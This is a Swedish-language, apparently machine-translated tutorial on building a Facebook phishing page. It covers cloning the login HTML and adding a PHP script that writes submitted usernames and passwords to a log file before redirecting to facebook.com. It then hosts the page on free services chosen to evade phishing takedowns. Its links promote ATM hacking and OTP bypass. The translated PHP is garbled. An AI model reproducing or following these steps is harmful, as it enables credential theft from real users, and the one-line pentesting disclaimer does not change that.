Innehållsförteckning
hur man skapar en Facebook-phishing-länk
nyligen har jag stött på många guider om att skapa phishing-sidor. Även om principerna bakom varje guide är likartade, fungerar de flesta värdlösningarna i guiden inte längre på grund av en ökning av nedslagningen av phishing-sidor av värdföretagen. I den här guiden kommer jag att gå igenom alla steg som krävs för att skapa och vara värd för en phishing-sida efter eget val. Njut!
ladda ner HTML-indexet på Målwebbsidan
för att börja måste du hämta HTML-indexet på sidan. Det finns olika metoder för att göra detta, det finns även mallar online för populära webbplatser. I denna handledning kommer jag att använda det mest grundläggande sättet för att vara så noob-vänlig som möjligt.
Läs också: så här skapar du en phishing-webbplats med kali linux
navigera till din webbsida
i den här handledningen kommer jag att phish Facebook.
visa källan till webbsidan.
beroende på din webbläsare kan det finnas olika metoder. Normalt görs det genom att högerklicka på webbplatsen och klicka på ”Visa källa”. Jag har gjort det i min webbläsare och ett windows borde komma ut som det här:
på rutan till höger är källan till webbplatsen. Vilket leder vidare till nästa steg:
ladda ner och spara källkoden
markera rutan och kopiera och klistra in allt i rutan till ett txt-dokument. Använd anteckningsblock på windows och ett enkelt textredigeringsprogram om du inte använder windows. (Använd inte program som Word eller Pages eftersom det är riktigt långsamt). När du har gjort det klickar du på ”Spara som” eller vilket alternativ som låter dig spara det dokumentet. På anteckningsblock ska det se ut så här:
ändra ”Spara som typ” till alla filer och ändra kodningen till Unicode.
därefter namnge dokumentet ” index.html”, uppenbarligen utan talmärken.
Grattis! Du har avslutat det första steget i handledningen!
Läs också: Hur man gör Facebook Bluff utan blivit bannad eller bli blockerad
lektion 2
skapa en PHP-fil för Lösenordsskörd
PHP-filen är i grunden det verktyg som skördar användarnas lösenord i detta scenario. Det finns flera sätt du kan skapa denna PHP om du har någon programmeringskunskap, men om du inte gör det, kopiera bara mitt exempel PHP.
<?php
rubrik (’plats: facebook.com’);
$handtag = fopen (”logga.txt”, ”a”);
foreach ($_POST som $variabel = > $ värde) {
fwrite ($handtag, $ variabel);
fwrite ($handtag, ”=”);
fwrite ($handtag, $värde);
fwrite ($handtag, ”\r \ n”);
}
fwrite ($handtag, ”\r\n\n \ n \ n”);
fclose ($handtag);
avsluta;
?>
samma som ovan, spara PHP-filen som ” alla filer ”och som” post.php”. Ändra kodningen till Unicode och du bör vara redo att gå!
ändra sidan HTML-fil för att införliva din PHP-fil i den.
nu måste vi införliva vår PHP-fil för att ta emot lösenord som användarna skickar.
hitta Lösenordssändningsmetoden
först måste du se hur webbplatsen handlar när användaren skickar ett användarnamn-lösenord.
för Facebook är allt du behöver göra att Ctrl-F och skriv” = action ” i fältet.
nu måste du ersätta allt i den understrukna delen med ”post.php”, behåll talmärkena. (bara en uppsättning snälla).
självklart kommer denna metod att vara annorlunda för andra webbplatser. En bra metod att hitta den är att använda verktyget Inspektera element i de flesta moderna webbläsare och klicka på inloggningsknappen. Hitta något som liknar ovanstående metod.
Läs och: lär dig att hacka ATM-kort, maskiner som använder Wizcardo programvara
observera: du kommer att behöva ändra detta senare när du faktiskt värd för webbplatsen.
värd för PHP-filen för lösenordslagring
nu är här den saftiga delen, vilket gör din falska webbplats online så att andra kan bläddra i den.
du kan använda alla gratis värdtjänster för att vara värd och lagra lösenord. Värdplanen måste dock innehålla något som kallas ”FTP”. För denna handledning kommer jag att använda 000webhost.
navigera till FTP-servern för din webbhotell
för detta steg antar jag att du redan har skapat en webbplats med din webbhotell.
för 000webhost klickar du helt enkelt på ”File manager” och klickar på ”Upload Files”. Här är en bild av FTP-servern för 000webhost:
ignorera de andra filerna, Det är bara några av mina personliga saker, som inte är relaterade till denna handledning.
Ladda upp dina PHP-filer och ändra tillstånd
som du kan se har jag redan laddat upp min PHP-fil. Men du behöver bara ladda upp den till huvudmappen på din FTP-server. (Vissa FTP-server tillåter dig inte att ladda upp till rotmappen, följ bara deras specifika instruktioner).
nu måste du ändra tillståndet till ”777”, vilket i princip är varje enskilt tillstånd. När du uppmanas att kryssa i rutor för behörigheterna, kryssa bara för varje enskild.
nu kan du stänga FTP-servern. Anteckna din webbadress!
Läs och: steginstruktioner för att kringgå OTP-verifiering på alla webbplatser
värd för den faktiska Phishing-sidan
för detta steg måste du använda den exakta värdleverantören som jag använder, annars blir du förbjuden.
det finns en anledning till att jag inte använder samma webbhotell för min faktiska sida, och det beror på att de flesta webbhotell kommer att använda någon form av skanning för att upptäcka phishing-sidor. Jag kan prova flera värdtjänster tidigare och alla förbjöd mig inom 30 minuter efter att ha laddat upp indexfilen.
konfigurera inlägget.php Forum
nu, innan du är värd för webbplatsen, Kom ihåg inlägget.php / inloggningsformulär sak vi konfigurerade ovan?
du måste hitta inloggningsformuläret igen i ditt index.html och ersätt ” post.php ” med ” http://yourwebsiteforyourpostphpupload/post.php”, förutsatt att du laddat upp till rotmappen. Kom ihåg att lägga till http: / / framför webbplatsen. För att testa detta, navigera till webbplatsen (http://yourwebsiteforyourpostphpupload/post.php) och se om den omdirigerar dig till Facebook.med, om det gör så har du klistrat in rätt webbplats. Om det inte gör det, dubbelkolla om du har laddat upp din fil till rätt katalog.
värd för den faktiska sidan
navigera till htmlpasta.com. du kommer att se något liknande det här:
sedan måste du kopiera indexet.html-fil för din phishing-webbplats och klistra in den här.
Klicka nu på re och klicka på Klistra in, du får en länk till din webbplats.
Slutsats
Grattis! Du har slutat vara värd för din första phishing-webbplats! Navigera till din webbplats och försök att ange några falska inloggningsuppgifter, när du klickar på inloggningsknappen ska den omdirigera dig till facebook.com. logga in på din FTP-server som du var värd för ditt inlägg.php-fil, och det ska finnas ett nytt dokument som heter Log.txt som lagras i samma mapp som ditt inlägg.php-fil. Eventuella inloggningsuppgifter ska lagras där.
Läs också: 2020 yahoo yahoo-format, faktureringsformat, pdf-nedladdning
Använd inte detta för skadligt syfte, använd endast för penetrationstestning och med tillstånd från ditt offer.
